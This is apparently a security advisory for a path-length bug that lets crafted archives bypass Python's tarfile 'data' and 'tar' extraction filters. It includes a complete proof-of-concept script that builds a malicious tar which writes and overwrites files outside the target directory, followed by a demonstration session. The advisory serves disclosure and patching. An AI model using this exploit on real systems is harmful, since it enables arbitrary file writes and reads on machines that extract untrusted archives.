Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementations tar_filter ("tar") and data_filter ("data"), each with differing checks to improve the safety of tarfile extraction.
A bug exists when processing a path with symlinks is shorter than PATH_MAX, but longer than PATH_MAX when the symlinks are substituted by os.path.realpath(). Any symlinks that are beyond PATH_MAX are not expanded.
os.path.realpath() is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later during extractall() or extract() the paths are used without passing them through os.path.realpath().
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Critical - Anyone using the TarFile.extractall() or TarFile.extract() with filter="data" or filter="tar", directly or indirectly, must patch immediately, or introduce other mitigating controls.
This proof-of-concept assumes it is being run under /home/username.
The tar file created in this PoC will modify the /home/username/flag/flag file that exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
$ pwd /home/username $ mkdir flag $ echo "hello world" > flag/flag
import tarfile import os import io import sys # 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896 # on OSX), leaving 128 bytes for a prefix and at least a few chars of the link comp = 'd' * (55 if sys.platform == 'darwin' else 247) steps = "abcdefghijklmnop" path = "" with tarfile.open("poc.tar", mode="x") as tar: # populate the symlinks and dirs that expand in os.path.realpath() for i in steps: a = tarfile.TarInfo(os.path.join(path, comp)) a.type = tarfile.DIRTYPE tar.addfile(a) b = tarfile.TarInfo(os.path.join(path, i)) b.type = tarfile.SYMTYPE b.linkname = comp tar.addfile(b) path = os.path.join(path, comp) # create the final symlink that exceeds PATH_MAX and simply points to the # top dir. this allows *any* path to be appended. # this link will never be expanded by os.path.realpath(), nor anything after it. linkpath = os.path.join("/".join(steps), "l"*254) l = tarfile.TarInfo(linkpath) l.type = tarfile.SYMTYPE l.linkname = ("../" * len(steps)) tar.addfile(l) # make a symlink outside to keep the tar command happy e = tarfile.TarInfo("escape") e.type = tarfile.SYMTYPE e.linkname = linkpath + "/../flag" tar.addfile(e) # use the symlinks above, that are not checked, to create a hardlink # to a file outside of the destination path f = tarfile.TarInfo("flaglink") f.type = tarfile.LNKTYPE f.linkname = "escape/flag" tar.addfile(f) # now that we have the hardlink we can overwrite the file content = b"overwrite\n" c = tarfile.TarInfo("flaglink") c.type = tarfile.REGTYPE c.size = len(content) tar.addfile(c, fileobj=io.BytesIO(content)) # we can also create new files as well! content = b"new!\n" n = tarfile.TarInfo("escape/newfile") n.type = tarfile.REGTYPE n.size = len(content) tar.addfile(n, fileobj=io.BytesIO(content))
$ pwd /home/username $ ls flag # check the flag dir and file are unchanged flag $ cat flag/flag hello world $ mkdir test # this is where the tar is extracted $ mkdir otherdir # this is a dummy dir to keep everything clean $ cd otherdir $ python3 Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> c >>> CTRL-D $ cd .. $ ls flag # the flag dir is different! flag newfile $ cat flag/flag overwrite $ cat flag/newfile new!
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025